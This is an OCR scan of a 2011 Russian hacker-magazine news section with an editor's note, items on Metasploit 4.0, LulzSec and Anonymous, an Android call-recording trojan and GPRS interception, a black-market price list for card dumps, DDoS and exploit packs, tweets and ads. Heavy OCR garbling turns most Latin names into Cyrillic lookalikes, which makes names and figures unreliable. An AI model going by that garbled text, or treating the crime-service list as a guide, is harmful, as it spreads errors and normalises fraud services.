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НОВЫЙ ДИЗАЙН: НА 24 ММ 
КОРОЧЕ, НА 100% КРУЧЕ! 

Десятый по счету редизайн журнала зашел у нас довольно далеко: 
вместе с дизайном мы поменяли и полиграфический формат, и арт- 
директора, и даже тип лака на обложке. Что уж говорить про структуру 
статей и множество мелких фишек, которые мы заготовили и зарядили 
в материалы этого номера. 

Сразухочется ответитьна вопрос: «Зачем вы укоротили журнал?». 
Все просто: форматА4 хреново нам подходил из-за неоптимальных 
пропорций между шириной и высотой. Теперь журнал выглядит шире и 
лучше приспособлен для верстки нашего контента с кучей листингов 
и скриншотов. При этом могу тебе гарантировать, что в новый макет не 
стало влезать меньше инфы: вместимость журнала осталась прежней 
из-за более эффективного использования пространства. 

Должен сказать, что я лично и вся команда журнала с нетерпени- 
ем ждем твоей реакции на реализованные изменения. Проделана 
большая работа, и, каквсегда бываетв подобных случаях, наступил 
волнительный момент презентации изменений и сбора первых впе- 
чатлений. Прошу тебя поделиться с нами своими мыслями: в наших 
группах в соц-сетях, на сайте ха кер.ги, по электронной почте, ну или 
даже «Почтой России». 

Другое крутое событие этого месяца — прошедший йЕРСОМ 19 и 
российская команда, которая впервые участвовала в финальной части 
престижного СТР. Чертовски приятно, что словосочетание «русские 
хакеры» начинает теп ерь ассоциироваться на международной арене 
не только с кибер преступи остью, но и с ѵѵЫ*еНа*-сообществом, кото- 
рое активно развивается в России. 
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МЕОАМ ЕѴѴ5 




БОЛЕЕ 6452 САЙТОВ дефейснул 
тунисскийхакер, скрывающийся 
под никомТЬе077 (Натсіі Наскег). 
Практически хакерский рекорд 
Гиннесса. 



ТОРІАРѴАРЕСТОВАН. ИЛИ НЕТ? 



В ВЕЛИКОБРИТАНИИ, ПОХОЖЕ, ОТЫСКАЛСЯ ОДИН ИЗ ЧЛЕНОВ ІЛЛ.25ЕС 




«Вы несможе- 

теарестовать 

идею», — гласит 

последняязапись 

втвиттереТоріагу. 

Насудхакерявился 

втемныхочкахи 

снепробиваемым 

покер-фейсом 



есмотря на то что ШіБес'ы недавно объявили о роспуске и прекраще- 
нии деятельности, полиция отнюдь не перестала их искать. И одного, 
похоже, даже нашли. 27 июля на Шетландских островах британская 
полиция при поддержке ФБР арестовала 18-летнего парня, который, по их 
данным, был пресс-секретарем группы — вел ихТѵѵіиеги скрывался в Сети под 
ником Торіагу. Настоящее имя предполагаемого хакера Джейк Девис. Почему 
«предполагаемого»? Потому что дело довольно странное. Копы уже предъяви- 
ли парню обвинения в несанкционированном доступе к компьютерным систе- 
мам, участии в организации БсІоБ-атак и других преступлениях. Также полиция 
утверждает, что на компьютере подозреваемого нашли доказательства, втом 
числе 750 000 паролей, конфиденциальные данные организации N45, а также 
наброски аферы слиповой новостью о мертвом Руперте Мердоке. Однако есть 
некоторые «но». Так, в блоге БиІіЗес ЕхрозесІ высказываются серьезные со- 
мнения в том, что задержанный в самом деле имеет отношение к БиІгЗес. Более 
того, раскопаны и опубликованы ( раБІеЬіп.сот/кЯЗТісд ) странные логи, где 
Торіагу признается собеседнику, что «одолжил» свой нику некоего британца с 
севера страны, чтобы пустить копов по ложному следу. Правда ли это? Похоже, 
нет. Джейк пока отпущен под подписку о невыезде, посажен под домашний 
арест и в лучших традициях фильма «Хакеры» лишен доступа к Сети. 




ГАДЖЕТ ДЛЯ 
ПОИСКА КЛЮЧЕЙ 



НАКОНЕЦ-ТО НАКЛЮЧИ МОЖНО БУДЕТ ПОЗВОНИТЬ! 

аверное, с каждым из насхоть раз приключалась 
такая история:утро, пора бежать, ноты лихора- 
дочно разыскиваешь по квартире связку ключей, 
которая мистическим образом куда-то испарилась. В 
такие минуты мечтаешь: «Вот было бы круто, если бы на 
ключи можно было позвонить, как на мобильник». Мечты 
сбываются! Повесив на ключи вместо брелока гаджет 
СоЬга Тад, работающий с ВІиеІооІН и 6Р5, и установив на 
мобильный приложение СоЬгаТад, ты сможешь запелен- 
говать пропажу, где бы она ни находилась. После того как 
ты нажмешь на пару клавиш, это замечательное изобрете- 
ние покажеттебе схему, какнайти ключи. Такжев прило- 
жении есть возможность задать максимальное расстояние 
удаления отключей, после превышения которого телефон 
подаст сигнал и покажет, где они находятся. Но защита 
двухсторонняя: с ключей можноузнать, где телефон, или 
ключи могутпросигнализировать, еслителефон вдруг 
начнетотнихудаляться. Согласись, стакимустройством 
шансы статьжертвой карманника или неприятной случай- 
ности уменьшаются. Теперь осталось придумать что-то 
подобное для поиска носков. Кстати, цена этого замеча- 
тельного девайса составляет всего 60 долларов! 








РауРаГ 



НАВІ.АСКНАТ2011 
ПРОВЕЛИ ОПРОС: 

«Апопутоиз и І_иІ25ес— 
герои или негодяи?». 

36 % ответили, что парни — 
герои, зато 64 % уверены, 
что они преступники. 



ИЗ-ЗАСБОЯ В РАБОТЕ 

Атагоп ЕС2 крупнейшие 
сайты (ВесШіІ, ИеНИхит. д.) 
не работали более 30 минут. 
Оказалось, в дата-центр 
Атаюп попала молния! Вот 
тебе и облака. 



КОЛИЧЕСТВО РУССКО- 
ЯЗЫЧНЫХАККАУНТОВ 

вТѵѵіНег'е уже превышает 
1 млн, сообщает «Яндекс». 
Однако лишь6,4% из них 
пишут в свой микроблог в 
течениедня. 



30 ЛЕТ ИСПОЛНИЛОСЬ М5- 
005'У— легендарной дис- 
ковой операционной системе 
компании МісгозоК.ТакжеЗО 
летназад, 12августа 
1981 г., был выпущен ком- 
пьютер ІВМ РС5150. 



РАУРАЬ НЕ РАЗРЕШИТ 

российским пользовате- 
лям принимать платежи в 
ближайшем будущем! ЗаяВ' 
лениеотакой возможности 
и опубликованные условия 
признаны ошибкой! Увы. 
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Хотите 

больше 




клиентов? 



Они уже ищут вас на Ооо§1е! 



поиском Ооо^Іе ежемесячно пользуется 70% аудитории Рунета* Сервис контекстной 
рекламы Соо^Іе ЛсіѴѴогбі размещает рекламные объявления рядом с результатами поисковых 
запросов пользователей. Там их смогут увидеть ваши потенциальные клиенты, когда будут искать 
информацию о ваших товарах или услугах. 



Начните рекламироваться на Соо^іе прямо сегодня: просто позвоните, и мы бесплатно 
Поможем создать вашу первую рекламную кампанию в бор^е АсМогсЬ. 



ч 8 495 780-00-22 (для Москвы) 

V» 8 800 100-46-64 (для регионов) 



Мы работаем по будням с 9:00 до 20:00 
(по московскому времени) 



Получите подарочный сертификат на 1000 рублей на первую рекламную кампанию 
в С о о^і е АгіѴѴогб? на ѵѵѵѵѵѵ.^оодіе.гъ /асКѵо гЦб/х а ке р 



* По дынном Іцъоі; М^йіаСТ. йкІйфь-Дйкабрь ^ъИО 



Со §1е АсІѴѴогсІз 



Реклама 



МЕ6АЫЕѴѴ5 



В СЕРВИСЕ МИКРОБЛОГОВТѴѴІТТЕК'Апоявились пользовательские фотогалереи. КонецТѵѵіІріс.сот и прочим сервисам. 



НОВЫЙ МЕТА5РШІТ 



КОМПАНИЯ НО МООК ВЫПУСТИЛА НОВУЮ ВЕРСИЮ СВОЕГО 
ЗНАМЕНИТОГО ИНСТРУМЕНТАРИЯ 




августа компания РарісІ7 объявила о долгожданном 
релизе Ме^азріоіі; РгатеѵѵогкД.О. Эйч Ди Мур и сотова- 
рищи не часто радуют публику новыми версиями, на- 
пример, версияЗ.Овышла вдалеком марте2007 г.! Разумеется, 
данная новость создала немалый ажиотаж в кругах специали- 
стов по компьютерной безопасности. Если раньше основной 
целью МеіазрІоіТа было получить шелл на уязвимой машине, то 
теперь подход немного поменял ся. В метасплоит был и добав- 
лены десятки различных вспомогательных модул ей, а также 
более 200 модулей, предназначенныхдля сбора различного 
рода данных о цели. Вся собранная информация может быть 
сохранена в БД. Особенно авторы акцентируют внимание и на 
том, что Меіазріоіі: Ргатеѵѵогк4.0 стал куда более пластичен по 
сравнению с З.х-версиями. В новой версии уделили внимание 
и ш ирокому распространению технологий ОЕРиАЗБР. Графи- 
ческую обол очку тз^диі переписали с 6ТК на Заѵа, пофиксили 
баги и даже нарисовали новый АЗСІІ-баннер. Однако, говоря о 
багах, нельзя не заметить, что в блоге РарісІ7 честно сообщает- 
ся, что некоторые фишки МеІіазрІоіЫ.О ещетолько предстоит 
доделать, а частьфункционала пока далека отидеала. В целом 
все это выглядит довольно странно и наводит на мысли, что Мур 
и сотоварищи немного поторопились с релизом. 





716 

эксплоитов 

361 

вспомогательный 

модуль 

68 

модулей для вы- 
полненияопераций 
послеуспешной 
эксплуатации 
входятсейчасв 
пакетМеІазрІоіІ. 
КодМеІазрІоіІ'а рас- 
пространяется под 
лицензией ВБР 



«ОСОБОЕ МНЕНИЕ» 
ВЖИЗНЬ 



СОФТ НАУЧИЛСЯ ПРЕДСКАЗЫВАТЬ ПРЕСТУПЛЕНИЯ 

□ дивительным и невероятнымзанимаются полицей- 
ские из американского города Санта-Круз (штат 
Калифорния]. Там на практике применили новейшую 
разработку — программу, способную предсказывать, когда и 
гдедолжносовершиться преступление, будьто квартирная 
кража или угон машины. На самом деле никакой магии здесь, 
конечно, нет. Волшебный, на первый взгляд, софтсоздан 
труп пой ученых, в которую вошли два математика, антрополог 
и криминолог. Методика работы программы почти аналогична 
методике расчета силы остаточных подземныхтолчков после 
землетрясений. Разработка опирается на статистические 
данные за последние восемь лет, анализирует их, сопоставля- 
ети на ихоснове генерируетпрогнозотносительно наиболее 
вероятных мести времени совершения преступлений в буду- 
щем. Причем прогнозы ежедневно корректируются сообразно 
новым данным. Как ни странно, это работает. «Программа уже 
помогла офицерам предотвратить несколько преступлений 
и совершить пять арестов», — заявил изданию «Нью-Йорк 
тайме» аналитик криминального отдела полиции Зак Френд. 
Теперь копы за ранее выезжают на места, где вероятность 
совершения преступления наиболее высока. По словам все 
тогожеФренда, «первые результаты впечатляют: в июле 
количество ограблений снизилось на 27% по сравнению с ана- 
логичным месяцем прошлого года». Аналогичнуютехнологию 
скоро планируют внедрить и в Лос-Анджелесе. 




600СІ.Е ПОКУПАЕТ МОТОКОІ.А 

(мобильное подразделе- 
ниекомпании)за12,5млрд 
долларов. Таккакотделение 
Моіогоіа МоЬіІіІузанимается 
выпуском мобильныхтеле- 
фонов и смартфонов, покупка 
обеспечитвеликолепную под- 
держку мобильной ОС Апбгоісі. 
Завершить сделку планирует- 
ся в конце2011— начале2012 
гг. Подразделение Моіогоіа 
станеткрупнейшим приобре- 
тением корпорации боодіе. 





ВЫШЛАБЕТА-ВЕРСИЯ 
РІКЕРОХУдля ПКи 
устройств на Апсігоісі. 

Новая версия используетна 
20-50% меньше памяти, чем 
ее предшественницы. 




3 ДВСЕХРУТКИТОВ живут 
на машинах под управлени- 
ем ѴѴіпсІоѵѵзХР, рапортует 
Аѵазі. 74% заражений было 
найдено именно на компью- 
терахс«хрюшкой». 
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ПоОлдитр.пь ЭОО& 
Гэрмашев Евгений 
I МнмЫлиіек 




Кол тм Снрг&й- 
г. Ярославль 



Иадщннк-сів Артем 
г г СанктгПетербѵрг 



Гап лямов Рим ль 
г, Ѵфл 



Скрнлнн Александр 
г Челябинск 



Рйимиші Тагьнна 
г. Челябинск 



Общий срок проведения Акции - с 15 августа 2011 г. по 15 февраля 2012 г. 

Регистрация кодов - с 15 августа 2011 г. по 2 декабря 2011 г. включительно на сайте ѵѵѵѵѵѵ.реіг-і.ги или по зтз на номер 5206. Информация об Организаторе Акции, правилах ее проведения, количестве призов или выигрышей 
по результатам Акции, сроках, месте, порядке их получения и стоимости отправки 5М5 - на сайте ѵѵѵѵѵѵ.реіг-і.ги и ѵѵѵѵѵѵ.гизіоіегеі.ги. 

*10 сертификатов на сумму 2 000 000 рублей каждый. 




МЕ6АЫЕѴѴ5 



83% ОТ ВСЕХ ПОЛЬЗОВАТЕЛЕЙ 600СІ.Е+ являются неактивными, сообщает компания ВітеАпаІуІісз. 



5АМ51ІЫ6 6АІ_АХѴХС0ѴЕР 



«ГУГЛОФОН», С КОТОРЫМ ХОТЬ В ОГОНЬ, ХОТЬ В ВОДУ 

□ то время как прилавки 

магазинов оккупированы 
смартфонами, коммуника- 
торами и планшетами всех мастей, 
многие из нас испытываюттеплую 
ностальгию по «неубиваемым» мо- 
бильникам. Не знаю, как тебе, а нам 
порой искренне не хватает старого 
Егісззоп Р31 Оз с антенной «акулий 
плавник». Абыл ведьещезамеча- 
тельный Зіетепз МЕ45... Эти аппа- 
раты вспоминаются стакойтихой 
радостью, потому что современные 
смартфоны, увы, штука довольнохрупкая: один неосторожный удар, иужезамена 
стекла. Одно падение, и почти гарантированный визитв сервис, где, вероятно, 
придется оста вить несколько тысяч. Та кое положение вещей не устраивает мно- 
гих людей, а порой и вовсе становится решающим фактором, останавливающим 
человека от покупки. Но сегодня на улице поклонников прочной техники празд- 
ник. Компания За тзипд объявила о том, что расширяет свою линейку смартфо- 
нов на базе АпбгоісГа моделью Ѳа Іаху Хсоѵег (ѲТ-Б5690) в защищенном от внешних 
воздействий корпусе. Новинка соответствуеттребованиям стандарта ІР67, что 
на человеческом языке означает полную пыленепроницаемость, устойчивость к 
падениям и даже возможность погружения аппарата на глуби ну до 1 м в течение 
получаса. Замечу, что до недавнего времени в линейку Хсоѵег входили лишь 
самые простые устройства, однако За тзипд решил пересмотреть свою политику 
в отношении серии. 

6а Іаху Хсоѵег это самый что ни на есть полноценный смартфон с ОС АпсІгоісІ 2.3 
ОіпдегЬгеасІ на борту. При всей своей «неубиваемости» новинка остается весьма 
изящной, ее вес равен 135 г, а толщина составляет 12 мм. Диагональ дисплея 
составляет 3,65 дюймов, и он доп олнительн о защищен устойчивым к царапинам 
закаленным стеклом, которое в 4-5 раз прочнее обычного. Внутри ОаІахуХсоѵег'а 
можно обнаружить процессор с тактовой частотой 800 М Гц, 1 50 Мб флеш -памяти, 
с л от для карт памяти формата тісгоЗО, беспроводные адаптеры ѴѴі-Рі 802.1 1 п и 
ВІие^ооШ 3.0, модуль 6 Р5 и поддержку стандарта Н5Р0А. Также присутствуют 
камера на 3 мегапиксела, оснащенная светодиодной вспышкой (ее можно ис- 
пользовать в качестве фонарика], ЕМ -радио, 115 В 2.0, 3,5-аудиоразъем и доволь- 
но емкий аккумулятор 1500 мАч. 

Ксожалению, пока модельбаІахуХсоѵеганонсированатолькодля Германии и 
Швеции, где начало продаж намечено на октябрь-ноябрьтекущего года. Как будет 
обстоять дело с другими странами, пока не ясно. Однако известно, что в Швеции цена 
смартфона составит 2800 шведских крон, что равно примерно 12,7 тыс. рублей. 

Также хочется заметить, что защищенных аппаратов на АпсІгоісІ 'е вообще не- 
много. Из достойных альтернатив можно назвать разве что Моіюгоіа йе^у и Зопу 
Егісззоп Хрегіа Асііѵе. 
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БатзипдОаІаху Хсоѵег оснащен приложениями БатзипдБосіаІНиЬ, с помощью 
которых можно общаться с кем угодно, пользуясь единым удобным интерфейсом 




ХР ПОТИХОНЬКУ СДАЕТ ПОЗИЦИИ 



ВПЕРВЫЕ ЗА ВСЮ 
ИСТОРИЮ НАБЛЮДЕНИЙ 
ДОЛЯ ѴѴІЫ00ѴѴ5 ХР НА 
РЫНКЕ УПАЛА НИЖЕ 
ОТМЕТКИ 50% И ТЕПЕРЬ 
СОСТАВЛЯЕТ 49,69% 
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Черный рынок 

ЧТО ПОЧЕМ? 



В интернете давным-давно сформирован 
черный рынок персональных данных 
и криминальныхуслуг. Купить можно 
практически все, причем дешево! 







Текстовая информация 
обанковской карте. 



Дамп магнитной полосы 
банковской карты. 



АЬизе-устойчивый хостинг 
(вмесяц). 



Вывод ворованных денег банковским 
переводом (от$5000). 




ОйоБ сайтов и сервисов 
(всутки). 



Сплоитпак — набор для заражения 
компьютеров (годовая лицензия). 



Технологичный 

банковскийтроян. 



Доступ кбанковскомуаккаунту 
сбольшим балансом. 




Регистрация назакрытомфоруме. 
Кроме денегтребуются рекомендации от 
зарегистрированных пользователей. 



Пользование ОоиЫеѴРІЧ -сер висом 
для эффективной анонимизации 
(вмесяц). 



Активация любого интернет- 
сервиса на левыйтелефон 
БМБ'кой либо звонком. 



Банковская карта исчетв 
европейском банке, оформленный 
на подставное лицо. 





Неделя платной рекламы на Заражение тысячи компьютеров в США Заражение тысячи китайских компьюте- Подписка на зоскз-сервис 

закрытом хакерском форуме. через качественный взломанный сайт. ров неустановленного происхождения. (вмесяц). 
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МаксимЧатский 



МЕ6АЫЕѴѴ5 



СТРАНИЧКУ ПАВЛА ДУРОВА ВКОНТАКТЕ ДЕФЕЙСНУЛИруферы, которые забрались в офис соцсети и поменяли статусе его компьютера 



АЫБРОЮ-ТРОЯН СЛУШАЕТТЕБЯ 



6РР5 НЕУСТОЯЛ 



МАЛ ВАРЬ НАУЧИЛСЯ ЗАПИСЫВАТЬ ПЕРЕГОВОРЫ 




Между прочим, по 
мнению«Лаборато- 
рии Касперского», 
во втором квартале 
2011 годной из 
основныхугроз 
сталиименно 
мобильные вирусы. 
Количество малваря 
дляАпсігоісіОБвоз- 
рословтриразапо 
сравнениюспервым 
кварталом 



появлении крайне неприятного троя на, ориентированного на девайсы на 
платформе АпсІгоісІ, сообщи л и специалисты компании САТесНпоІодіез. 
Инфицировав устройство, малварь получает конфигурационный файл, со- 
держащий основную информацию об удален ном сервере и параметрах. Затаившись, 
троян поджидает, когда пользовательначнетразговор, а дождавшись, записывает 
его в формате АРМ, сохраняя в каталоге зЬапдгЬои/саІІгесогсІ на карте памяти 
(ЗОСагсІ]. Вуаля, файл готов для передачи наудаленный сервер. Конечно, ранее по- 
добная малварьтоже перехватывала и фиксировала данные, будьто длительность 
звонков, номера входящих и исходящих номеров и тому подобное, однако сами раз- 
говоры все же не за писывал. ПословамсотрудниковСАТесНпоІодіез, это пока своего 
рода прототип. Дело втом, что прога пока неумеетустанавливаться самостоятельно: 
потенциальнаяжертва должна согласитьсяустановитьприложение, разрешив ему 
запись звука, чтение данных о состоянии телефона и предотвращение засыпания 
устройства. Что хакеры станут делать, заполучив записи разговоров, не совсем ясно, 
но пара нехороших идей на этот счетуже пришла нам в голову. 




о ^ 



Г ^ л 




См ул. ѵмп юіми * егііі 



А РЬплв ІЯІІ* 
А 1?І-Цгп І-ѴУІ-І. 

О ЙІІ 




ГЛУПОСТЬЛЮДСКАЯНЕЗНАЕТ ГРАНИЦ 



70% РОССИЙСКИХ ЮЗЕРОВ 
НЕ МОГУТ ОТЛИЧИТЬ ПИРАТ- 
СКИЙ КОНТЕНТ ОТ ЛЕГАЛЬ- 
НОГО, ЕСЛИ ВЕРИТЬ ОПРОСУ 
ФОНДА «ОБЩЕСТВЕННОГО 
МНЕНИЯ» 



НОВЫЙ ОБРАЗЦОВО-ПОКАЗАТЕЛЬНЫЙ 
ВЗЛОМ СОТОВЫХСЕТЕЙ 

ы уже неоднократно рассказывали тебе о крип- 
тографе, исследователе и просто интересном 
человеке — Карстене Ноле. Например, пару 
лет назад он продемонстрировал бюджетный (но очень 
действенный] способ взлома 65М -сетей, для которого 
требовалась лишь связка «ноутбук — сотовый», притом 
в качестве мобилки могла выступать самая примитивная 
модель «Моторолы» за 15 долларов. 

Теперь главный научный сотрудник берлинской 5есигМ:у 
НезеагсН І_аЬзрешил подвергнутьобоснованной критике 
6РРЗ. Каки в прошлый раз, виновными в уязвимости 6РРЗ 
оказались не пользователи и даже не аппаратно-софтверная 
составляющая самих гаджетов. Вся вина на круп ных со- 
товых операторах, таких как Т-МоЬіІе, 02 6егтапу, ѴосЫопе, 
которые используют небезопасную реализацию 6РР5. 
Криптозащита в 6РР5 используется довольно редко, а если 
даже и применяется, то, со слов Нола, является «безнадежно 
устаревшей». Неудивительно, учитывая, что даже 128битная 
схема шифрования практически никем и нигде не применя- 
ется. Получается, что, с одной стороны, мы имеем отсутствие 
взаимной аутентификации, что позволяетхакеру подделать 
свое устройство под легитимный терминал абонента, и 
базовая сотовая станция будетпередаватьхакерутрафик 
ничего не подозревающих юзеров. С другой стороны, корот- 
кие ключи создают условия для беспрепятствен ных атак с 
использованием радужныхтаблиц. 

Карстен Нол сумел найти втехнологии серьезнуюуязви- 
мость. В рамкаххакерской конференции СНаозСоттипісабоп 
Сатр2011, прошедшей недавно в Германии, исследователь 
продемонстрировал ПО для снифинга 6РР5, при помощи кото- 
рого даже любитель сумеет перехватить 6РП5-да иные, если 
трафик не кодируется. Но даже при включенном шифровании 
атака возможна: во время своего доклада Нол также показал и 
некоторыетехники криптоанализа, благодаря которым можно 
без особых пробл ем дешифроватьтрафикОРРЗ со слабой 
защитой. Кслову, представленнаятехнология позволяет 
перехватыватьданные в радиусе 5 км! 

Исследователь отдает себе отчет в том, что его софт 
может подвергнуть операторов 6РР5, не пользующихся 
кодированием, непосредственной опасности. Однако это 
его мало смущает. Нол надеется, что сумееттаким образом 
подтолкнуть сотовых операторов к внедрению более 
защищенных систем шифрования. Если же после СИаоз 
Соттипіса^іоп Сатр реакции от операторов не воспосле- 
дует, эксперт всерьез намеревается опубликовать свои 
разработки в открытом доступе. Что ж, пожалуй, атаки 
хакеровтоже хорошая мотивация. 





Карстен Нол давнозанимаетсябезопасностьюсотовыхсетей 
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ЯЬаскегІѵѵееІз 

Твиттер в последнее время стал настоящей кладезьюзнаний по информационной безопасно- 
сти. Но это следствие. Важна причина — Твиттер стал местом, где обитаеттусовка самых про- 
двинутых ресерчеров и хакеров. Чтобы вовлечь тебя в этот мир и приблизить к элите, Алексей 
Синцов (йазіпізоѵ) в этой колонке будет ежемесячно отбирать самые интересные твиты. 





(аСМг^оМпКНеу: 

Дорогой (Эдоодіе, некоторые из 
наиболее интересных людей, 
которых я знаю, используют 
псевдонимы... Банить их на 6+ за это, это 
делает тебя бесполезным! 



(Э5есигі(уНіітог: 

Ооодіеч- САРТСНА: «Нам нужно 
удостовериться, что вы человек. 
Введите ваше реальное имя, 
номер телефона, а также номер социально- 
го страхования или номер паспорта, после 
чего нажмите кнопку "Я человек"». 



ГаОхсІіагІіе: 

Читаю доклады. 
Рецензирование — сложная 
штука! Я могу одобрить лишь 
15% тем. Моя задача — сделать Р5А «тех- 
нической» в этом году, но... 

Н Комментарий: Гражданин Чарли 

Миллер жалуется на темы докладов 
для одной из самых уважаемых конфе- 
ренций года — В5А. Организаторы выбра 
ли Чарли, чтобы отобрать технические 
доклады и сделать конфу «живее». 



(ВпісксІереІгіІІо: 

По ходу, народ забывает, что 
есть большая разница между 
«взломать» шифрование и 
«обойти» его. 



ГЭѴІІРЕМ: 

Ѵ1 _,— ^ Оаѵа 7 теперь доступна. Все моду- 
ли имеют поддержку А5І_Р, а зна- 
чит, обойти А5І_Р с помощью Оаѵа 
РОРуже не выйдет. Поздравляю 0гасІе/5ип! 



(Віаѵізо: 

АбоЬе исправила около 400 уни- 
кальных уязвимостей, которые 
я выслал им в АРБВ1 1-21 как 
часть работ по продолжительному аудиту 
безопасности. Не опечатка. 

□ Комментарий: 400! Просто чума. 

Кстати, не факт, что хотя бы 50 % из 
них была «эксплуатируема», но число заслу- 
живает удивления. А для любопытных ссы- 
лочка, как это было, — Ьіі.Іу/дЦгІР . 



(ЗіосІЬ: 

Различие между известными 
хакерами и настоящими зна- 
менитостями в том, что зна- 
менитости вообще-то знают, как хотя бы 
притворяться вежливыми. 




(Зхте: 

Ставлю физический сервер... 
Какая скука! Вива виртуали- 



зация! 



(Экеѵіптііпіск: 

Только что приземлился в Лас- 
Вегасе!!! 



Н Комментарий: Ага, напоминаю, что 
недавно БлэкХат и Дефкон прошел, 
где, кстати, было РЕКОРДНОЕ количество 
наших ребят! И Митник — там же. 



ОГгЬЬз: 

0Я заплатил 50 тыс. баксов за 
тест на проникновение, и все, что 
я получил, — это запуск сканера 
ІЧеззиз сертифицированным по СІ55Р товари- 
щем. Шр:/Д.со/РеІ~ігп2п . 





ГЭБІерІіапІзоѵ: 

Вперед! Вперед! Вперед, 
команда IV! Удачи вам, парни 
на #6еісоп\ 



Н Комментарий: 

Ага, результат мы знаем (если нет, 
читай материал про йеіюоп СТР в этом 
номере). Что ж, очень неплохо! 



ГЭрепІезіИ: 

Список 55І_-сканеров для пен- 
тестеров! Шр://ЬіІ.ІуД)8і5гТ . 



□ Комментарий: 

Иногда в твитах бывает именно то, что 
ты ищешь! Потому данный твит и попал сюда. 





(ВзІгОке: 

раскеІБІогтзесигіІу.сот + 

ехр і + Ей + Оаііу 

йаѵе + теІазрІоіСз сЬапдеІод 
— тяжело сделать круче. 

□ Комментарий: 

Милворма давно уж нет, и его созда- 
тель ((сІзІгОке] давно забил на этот проект. 

А ресурсов со сплойтами, как всегда, много. 



( 341414141 : 

Опять фейспалм! «Сервер Сізсо 
ТеІеРгезепсе [...] включает 
учетную запись гооі: [и пароль], 
которая включена по умолчанию». 
Шр:/Л.со/хіѴѴ27еѴѴ . 





(ЗОхсГіагІіе: 

Вау! 010 ЕсіМіог теперь есть и для 
Мае 05 X. Довольно скоро мне 
вообще не нужна будет винда! 
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МЕ6АЫЕѴѴ5 



НЕДАВНО В КИТАЕЗАКРЫЛИ 22 ЛИПОВЫХ МАГАЗИНА АРРІ.Е, которые вточности копировали официальные бутики Арріе Біоге. 



«АНОНИМУСЫ» 
ДОБРАЛИСЬ ДО ПОЛИЦИИ 



АУДИОСИСТЕМА 
ЕОІРІЕР С5 



ИМЯ ИМ ЛЕГИОН, И У НИХ ОЧЕНЬ ДЛИННЫЕ РУКИ 




охоже, скоро будетпроще сказать, кого еще НЕхак- 
нули Аноны. Кампания АпііЗес набирает обороты, 
и теперь очередь дошл а до полиции США. Атака 
была совершена на 77 веб-ресурсов, преимущественно на 
сайты шерифских управлений в штатах Луизиана, Арканзас, 
Миссисипи и Канзас. По неподтвержденным данным, по- 
страдала также полицейская академия и база данных с 
информацией о заключенных. Как бы то ни было, в сумме 
хакерам удал ось за получить бол ее 10 гигабайт трофейных 
данных, среди которыхбыла различная информация о более 
чем 7000 сотрудников правоохранительных органов. Утекло 
все — логины, пароли, номера социального страхования, 
данные банковских карт, адреса и даже электронные 
письма. Разумеется, прятатьдобычу отсетевой обществен- 
ности хакеры не стали и выложили все данные в открытый 
доступ. Дополнительно репутацию полиции подпортил итот 
факт, что у многих сотрудников обнаружились ненадежные, 
простые пароли (обычные словарные слова, их имена или 
номера значков). Кстати, «Анонимусы» заявляют, что слив 
инфы — месть за недавний арест 14 человек, обвиненных 
в участии в атаках, совершенных в декабре и нарушивших 
деятельность РауРаІ. Словом, «Анонимус не прощает» и не 
ленится об этом напоминать. 




Тем временем кто-то 
слил наРазІеЬіп 
данныеочленах 
полицииВАКТ(Вау 
Агеа Каріе! ТгапБІі). 
Информация обиме- 
нах,адресахисчетах 
болеечемЮОполи- 
цейскихоказались 
в открытом доступе. 
Однако, возможно, к 
этомуАпопутоиБ'ы 
непричастны 




НАБОР КАЧЕСТВЕННОЙ 2.1 И 2.1 + АКУСТИКИ ДЛЯ 
КОМПЬЮТЕРА 

родукция ЕсІіТіег уже много летпользуется в России 
заслуженной популярностью, поэтому мы не 
могли пройти мимо новой модели — С5. Новинка 
представляетсобой мультимедийные колонки 2.1 и 2.1 + 

(с внешним усилителем). Система оснащена 8-дюймовым 
сабвуфером и двухполосными сателлитами сэкраниро- 
ванными 3.5-дюймовыми динамиками и 3/4-дюймовыми 
шелковыми твиттерами. 

Внешний усилитель может похвастаться встроенными 
ЕМ -тюнером, II ЗВ -разъем ом и Зй- кард ридером. Вполне 
ожидаемо, что устройство умеет про и гр ы вать МРЗ, ѴѴМ А 
& РСМ с разнообразных носителей — навигация по меню и 
каталогам осуществляется с помощью пульта дистанцион- 
ногоуправления. 

Технические характеристики новинки: 

• Выходная мощность: РМ5 9ѴѴх 2 + 35ѴѴх 1 (ТН 0=1 0%) 

• Соотношение си гнал -шум: ™85 дБ (А) 

• Искажение: 0.5% 

• Входное сопротивление: ЮКОНт 

• Низкочастотный динамик: 8 дюймов (210 мм), экраниро- 
ванный, 40м. 

• Среднечастотный динамик: 3.5 дюйма (92 мм), экраниро- 
ванный, 40м. 

• Высокочастотный динамик: 13 мм, с шелковой куполь- 
ной мембраной, экранированный, 4 Ом. 

• Сабвуфер: 35 Вт. 





ГРЯДЕТ МОБИЛЬНАЯ ОС ОТ 
М02ША.На форуме для 
разработчиков МоііІІа 
появилось сообщение о том, 
что в стане компании кипит 
работа над проектом Вооі 
(о беско. Основываться ОС 
будет на движке беско, кото- 
рый используется и в других 
продуктах МогіІІа: например 
в Рігеіох'е и ТЬипсІегЬоІІ'е. 
Акцент в Вооі іо беско будет 
сделан на веб-приложения, 
написанные с применением 
НТМІ.5. 






3 МЛН ПРЕДУПРЕЖДЕНИЙ 

выдает ежедневно компания 
боодіе, предостерегая о вне- 
дрении вредоносного ПО для 
примерно 400 млн людей. 



ТРИ САМЫХПЛОХО ЗАЩИ- 
ЩЕННЫХ социальных сети, 
пользующихся наибольшим 
«успехом» у мошенников,— 
это РасеЬоок, Тѵѵіііег и 
МуБрасе, сообщаеткомпа- 
нияБорЬоз. 
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МЕ6АЫЕѴѴ5 



ВЫХОД ІРАР 3 ОТЛОЖЕН до следующего года, сообщает издание ОідіТітез. 



РАСЕВООК НАГРАДИТХАКЕРОВ 



КРУПНЕЙШАЯ НА ПЛАНЕТЕ СОЦСЕТЬУЧРЕДИЛА 
НАГРАДУЗАП0ИСКУЯЗВИМ0СТЕЙ 




Сначала РасеЬоок 
организовал соб- 
ственный хакерский 
конкурс, теперь 
поощряетхакеров... 
Таки до хакерской 
конференции 
им. Марка недалеко 



□ ледуя при меру других крупных игроков рынка, социальная сеть 

РасеЬоок решила заинтересовать потенциальных ловцов багов рублем. 
Точнее, долларом. Цукерберги компания учредили специальную про- 
грамму выплат, получившую название Беси гііу Вид Воип^у. В рамках дан ной 
программы, люди, на шедшие уязви мости и баги в сервисах социальной сети, 
получат за это деньги. Сколько? За висит от серьезности дырки. Стандартная 
награда равняется 500 долларам, однако руководство РасеЬооксулити более 
крупное вознаграждение за серьезные уязвимости. Точные суммы при этом 
